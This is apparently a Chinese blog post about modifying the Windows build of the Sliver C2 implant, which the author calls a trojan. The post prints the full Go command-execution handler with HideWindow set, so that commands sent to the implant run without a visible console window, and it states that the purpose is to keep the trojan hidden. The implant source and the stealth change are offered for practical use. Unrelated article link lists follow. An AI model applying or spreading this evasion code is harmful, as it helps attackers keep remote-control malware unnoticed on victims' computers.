向木马发出指令后, 如果是cmd命令会有一个黑窗口一闪而灭, 不利于木马隐藏, 需要将executeHandlerhandlers.go拷贝到handlers_windows.go里,核心代码为 cmd.SysProcAttr = &syscall.SysProcAttr{HideWindow: true}表示隐藏命令弹窗

func executeHandler(data []byte, resp RPCResponse) {

	var (

		err       error

		stdErr    io.Writer

		stdOut    io.Writer

		errWriter *bufio.Writer

		outWriter *bufio.Writer

	)

	execReq := &sliverpb.ExecuteReq{}

	err = proto.Unmarshal(data, execReq)

	if err != nil {

		// {{if .Config.Debug}}

		log.Printf("error decoding message: %v", err)

		// {{end}}

		return

	}

	execResp := &sliverpb.Execute{}

	exePath, err := expandPath(execReq.Path)

	if err != nil {

		execResp.Response = &commonpb.Response{

			Err: fmt.Sprintf("%s", err),

		}

		proto.Marshal(execResp)

		resp(data, err)

		return

	}

	cmd := exec.Command(exePath, execReq.Args...)

	cmd.SysProcAttr = &syscall.SysProcAttr{HideWindow: true}

	if execReq.Output {

		stdOutBuff := new(bytes.Buffer)

		stdErrBuff := new(bytes.Buffer)

		stdErr = stdErrBuff

		stdOut = stdOutBuff

		if execReq.Stderr != "" {

			stdErrFile, err := os.Create(execReq.Stderr)

			if err != nil {

				execResp.Response = &commonpb.Response{

					Err: fmt.Sprintf("%s", err),

				}

				proto.Marshal(execResp)

				resp(data, err)

				return

			}

			defer stdErrFile.Close()

			errWriter = bufio.NewWriter(stdErrFile)

			stdErr = io.MultiWriter(errWriter, stdErrBuff)

		}

		if execReq.Stdout != "" {

			stdOutFile, err := os.Create(execReq.Stdout)

			if err != nil {

				execResp.Response = &commonpb.Response{

					Err: fmt.Sprintf("%s", err),

				}

				proto.Marshal(execResp)

				resp(data, err)

				return

			}

			defer stdOutFile.Close()

			outWriter = bufio.NewWriter(stdOutFile)

			stdOut = io.MultiWriter(outWriter, stdOutBuff)

		}

		cmd.Stdout = stdOut

		cmd.Stderr = stdErr

		err := cmd.Run()

		//{{if .Config.Debug}}

		log.Printf("Exec (%v): %s", err, string(stdOutBuff.String()))

		//{{end}}

		if err != nil {

			// Exit errors are not a failure of the RPC, but of the command.

			if exiterr, ok := err.(*exec.ExitError); ok {

				execResp.Status = uint32(exiterr.ExitCode())

			} else {

				execResp.Response = &commonpb.Response{

					Err: fmt.Sprintf("%s", err),

				}

			}

		}

		if errWriter != nil {

			errWriter.Flush()

		}

		if outWriter != nil {

			outWriter.Flush()

		}

		execResp.Stderr = stdErrBuff.Bytes()

		execResp.Stdout = stdOutBuff.Bytes()

		if cmd.Process != nil {

			execResp.Pid = uint32(cmd.Process.Pid)

		}

	} else {

		err = cmd.Start()

		if err != nil {

			execResp.Response = &commonpb.Response{

				Err: fmt.Sprintf("%s", err),

			}

		}

		go func() {

			cmd.Wait()

		}()

		if cmd.Process != nil {

			execResp.Pid = uint32(cmd.Process.Pid)

		}

	}

	data, err = proto.Marshal(execResp)

	resp(data, err)

}

c2工具sliver 执行木马命令后会弹窗一闪而过的更多相关文章

  1. 使用 FileZilla FTP Client连接Vsftpd在执行LIST命令后提示连接超时

    使用 FileZilla FTP Client 连接 Vsftpd在执行LIST命令后提示连接超时. vi /etc/vsftpd/vsftpd.conf 添加: #开启被动模式 pasv_enabl ...

  2. 菜鸟调错(七)——控制台中执行mvn命令后提示‘cmd’不是内部或外部命令

    最近在cmd下使用mvn命令时,在执行完以后总会出现一句“‘cmd’不是内部或外部命令,也不是可执行程序或批处理文件”,如下图: 虽然命令执行成功了,不会有什么影响,但是身为强迫症晚期的我是绝对不能忍 ...

  3. linux执行python命令后permission denied

    linux下执行python后显示被拒绝问题定位: 1.检查下要执行的文件的权限是否存在执行权限,否则执行chmod命令赋予权限: 2.若赋予权限后仍然显示没有权限,检查下执行的python文件是否有 ...

  4. crt执行cat命令后乱码

    cat查看二进制文件后所有命令都乱码执行reset即可恢复

  5. 执行xcopy命令后出现Invalid num of parameters错误的解决办法

    作者:朱金灿 来源:http://blog.csdn.net/clever101 在执行一条批处理命令: xcopy /s /i /y C:\ppt D:\Program doc 开始很纳闷,上网一查 ...

  6. linux执行python命令后没有反应,不打印日志信息

    实际的python执行的软连接是路径是/opt/python2.7/bin/python,而设置的软连接错误如下: 修改该连接,是python指向/opt/python2.7/bin/python, ...

  7. [BAT] 执行xcopy命令后出现Invalid num of parameters错误的解决办法

    如果是Windows下的命令行,对于有空格的文件路径要加引号,对于xcopy命令就是源路径和目标路径都要加引号 xcopy "C:\ppt" "D:\Program do ...

  8. spark on yarn,client模式时,执行spark-submit命令后命令行日志和YARN AM日志

    [root@linux-node1 bin]# ./spark-submit \> --class com.kou.List2Hive \> --master yarn \> --d ...

  9. spark on yarn,cluster模式时,执行spark-submit命令后命令行日志和YARN AM日志

    [root@linux-node1 bin]# ./spark-submit \> --class com.kou.List2Hive \> --master yarn \> --d ...

  10. react+ant design 项目执行yarn run eject 命令后无法启动项目

    如何将内建配置全部暴露? 使用create-react-app结合antd搭建的项目中,项目目录没有该项目所有的内建配置, 1.执行yarn run eject 执行该命令后,运行项目yarn sta ...

随机推荐

  1. [转帖]使用 Dumpling 导出数据

      16 Contributors 使用数据导出工具 Dumpling,你可以把存储在 TiDB 或 MySQL 中的数据导出为 SQL 或 CSV 格式,用于逻辑全量备份.Dumpling 也支持将 ...

  2. gcore的学习

    gcore的学习-解决jmap无法生成dump文件的一种方法 背景 周末在跆拳道馆看孩子练跆拳道. 开着笔记本翻到了 扣钉日记 公众号里面的讲解 想着自己也遇到过无法保存dump文件的情况. 所以想学 ...

  3. [转帖]疑问:进程在竞争CPU时并没有真正运行,为什么还会导致系统的负载升高?

    疑问:进程在竞争CPU时并没有真正运行,为什么还会导致系统的负载升高? 因为存在CPU上下文切换. linux系统说明 Linux是一个多任务操作系统,它支持远大于CPU数量的任务同时运行.当然,这些 ...

  4. [转贴]英特尔Sapphire Rapids至强可扩展CPU完整型号爆料与路线图展望

    2022-10-13 15:15· 稿源: cnbeta   腾讯云服务器促销:2核2G首年仅需40元 历史新低   @结城安穗-YuuKi_AnS 刚刚在社交媒体上,分享了与英特尔下一代 Sapph ...

  5. Linux 清理 防火墙已有IP地址的方法

    最简单的处理 for i in `firewall-cmd --zone=trusted --list-sources` ;do firewall-cmd --zone=trusted --remov ...

  6. CoreDNS的配置文件修改

    CoreDNS的配置文件修改 今天浪费了4个小时来调整coredns 这里简单记录一下 注意修改点: 1 kubernetes cluster.local. 需要增加集群内的配置 2 forward ...

  7. .net web发布至阿里云服务器

    1.发 布网站第一步:右键网站主项目,选择 发布网站.如下图 第二步 填写发布网站的相关配置,选择配置文件,新建配置文件 第三步 选择发布的文件存放的位置 第四步,选择Release 再点击下一步,点 ...

  8. TienChin-课程管理-添加课程接口

    CourseController.java @PreAuthorize("hasPermission('tienchin:course:create')") @Log(title ...

  9. 错误的daemon.json配置,导致docker容器启动失败 Failed to start Docker Application Container Engine

    docker学习-配置错误的源 问题点剖析 参考 docker学习-配置错误的源 问题点剖析 使用docker安装了nginx,编写Dockerfile,映射端口,终于跑起来了.但是,当我重启服务器, ...

  10. 使用Docker单机部署Ceph

    安装Docker过程参考:https://www.cnblogs.com/hackyo/p/9280042.html 1. 创建Ceph专用网络 sudo docker network create ...